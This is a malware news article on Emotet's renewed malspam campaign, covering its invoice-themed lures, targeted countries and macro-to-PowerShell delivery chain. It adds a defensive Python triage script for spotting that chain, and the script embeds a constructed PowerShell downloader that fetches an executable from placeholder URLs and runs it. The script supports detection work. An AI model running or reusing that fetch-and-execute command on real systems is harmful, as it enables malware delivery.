After months of silence, Emotet came back with a new malspam campaign

Malicious email campaign targeting USA, Germany, Poland, Italy, and the United Kingdom spotted delivering malware-loader Emotet

Emotet activity has spiked again, and new malspam campaigns have been uncovered. Researchers observed Emotet campaigns targeting businesses, government institutions, and individual users around the world.[1] After going quiet at the start of the summer, the malware broke its silence on August 22nd, when its C2 servers were seen actively responding to requests again. That behavior caught researchers' attention and led them to the new campaign.[2]

The malspam campaign mainly uses “Payment Remittance Advice” and similar subject lines. It tries to trick recipients into opening the attached document and enabling its malicious macros. The macro then runs commands that download Emotet from compromised websites, most of which run WordPress.

The list of websites compromised in this recent Emotet malware campaign:


Emotet malware becoming strong: targeting tens of thousands of emails

According to several reports, the campaign has targeted almost 66,000 email addresses across about 30,000 domain names. The Emotet trojan campaign, which mainly aims at victims in Germany and Poland, was first spotted on Monday.[3] Working from stolen email data, the operators send messages containing executable attachments, download links, and other malicious components that deliver Emotet.

The malware then acts as a downloader for other threats, such as Ryuk ransomware.[4]

From home users all the way up to government-owned domains. The sender list includes the same dispersion as the targets. Many times we’ve seen precise targeting using a sender whose contact list appears to have been scraped and used as the target list for that sender. This would include b2b as well as gov to gov.

Emotet started out as a banking trojan and was later rewritten to function as a malware loader.[5] It runs one of the largest botnets, so a comeback was expected. The server activity noticed back in August led to a full re-establishment of communications with infected bots and brought the botnet back to full strength.

Different commands for victims from different parts of the world

The email itself, as is usual for malspam, carries a financial-themed subject line and is made to look like a reply in an existing conversation. As the Polish and German malspam samples show, the sender uses one of the following scenarios:

  • warning about the changes of the email address
  • informing about the invoice
  • claiming that there were problems with the bill

All of these pretexts are meant to convince the recipient to open the attached document and enable its malicious macro code.

Further analysis showed that this Emotet variant delivers an attachment containing either a fake Microsoft Office alert about a license agreement or a warning that the victim's copy of Word will stop working after September 20. Lures like these trick people into enabling macros and other content, which installs Emotet on the computer.

For Italian victims, the email uses the subject line “Numero Fattura 2019…”. Once enabled, the macro runs a PowerShell command that fetches the malicious payload from a URL on a compromised website. The botnet is ready to attack businesses, so organizations should be aware that Emotet is fully back in action.
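The chain described above (Office document, macro, PowerShell, download from a compromised site) is exactly what endpoint process-creation telemetry can catch. The following Python script is an added example, not code from the original article or from any of the researchers it cites. It takes a process record (parent process name plus command line), decodes a PowerShell -EncodedCommand payload (base64 of UTF-16LE), extracts the download URLs and scores the usual downloader indicators. The command line is a constructed sample with placeholder example.com/.net/.org URLs; the '@'-separated list of fallback URLs and the WordPress-style paths are assumptions modelled on the behaviour described above, not indicators copied from a real sample.

```python
import base64
import re
from typing import Dict, List, Optional

# Constructed sample of the kind of script a malicious macro launches.
# URLs are placeholders (example.com/.net/.org), not real compromised sites.
# The '@'-separated fallback list is an assumption for this example.
DECODED_SCRIPT = (
    "$u='http://example.com/wp-content/a1/@http://example.net/wp-admin/b2/@"
    "http://example.org/wp-includes/c3/'.Split('@');"
    "$p=$env:TEMP+'\\'+(Get-Random)+'.exe';"
    "foreach($x in $u){try{(New-Object Net.WebClient).DownloadFile($x,$p);"
    "Invoke-Item $p;break}catch{}}"
)


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command line as it would appear in a process-creation event.
SAMPLE_CMDLINE = "powershell -w hidden -nop -enc " + encode_powershell(DECODED_SCRIPT)

# PowerShell accepts any unambiguous prefix of -EncodedCommand, plus -ec.
ENC_FLAG = re.compile(r"[-/](?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"""https?://[^\s'"@;)]+""", re.I)
DOWNLOAD_API = re.compile(r"DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|BitsTransfer", re.I)
EXEC_API = re.compile(r"Invoke-Item|Start-Process|Invoke-Expression|\biex\b", re.I)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand script, or None if there is none."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def extract_urls(script: str) -> List[str]:
    """Pull every http(s) URL out of a decoded script, stopping at quotes and '@'."""
    return URL_RE.findall(script)


def triage(cmdline: str, parent: str = "") -> Dict[str, object]:
    """Score a process record for the macro -> PowerShell -> downloader pattern."""
    script = decode_encoded_command(cmdline)
    urls = extract_urls(script) if script else []
    indicators = {
        "office_parent": parent.lower() in OFFICE_PARENTS,
        "encoded_command": script is not None,
        "hidden_window": bool(re.search(r"-w(?:indowstyle)?\s+hidden", cmdline, re.I)),
        "downloader": bool(script and DOWNLOAD_API.search(script)),
        "executes_payload": bool(script and EXEC_API.search(script)),
        "fallback_urls": len(urls) > 1,  # several hosts tried in turn
    }
    score = sum(indicators.values())
    verdict = "malicious" if score >= 3 else "suspicious" if score >= 1 else "clean"
    return {
        "decoded": script,
        "urls": urls,
        # CMS paths worth a second look, given the compromised-WordPress hosting.
        "wordpress_paths": [u for u in urls if re.search(r"/wp-(?:content|admin|includes)/", u)],
        "indicators": indicators,
        "verdict": verdict,
    }


if __name__ == "__main__":
    for parent, cmd in [("WINWORD.EXE", SAMPLE_CMDLINE),
                        ("explorer.exe", "powershell -NoProfile -Command Get-Process")]:
        result = triage(cmd, parent)
        print(parent, result["verdict"], result["urls"])
```

In practice the parent-process check is the strongest single signal: a legitimate document has no reason to spawn PowerShell, so Office spawning any scripting host is worth alerting on even before the command line is decoded. The decoded URLs feed straight into blocking at the proxy and into hunting for other hosts that contacted the same compromised sites.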

About the author

Gabriel E. Hall is a passionate malware researcher who has been working for 2-spyware for almost a decade.
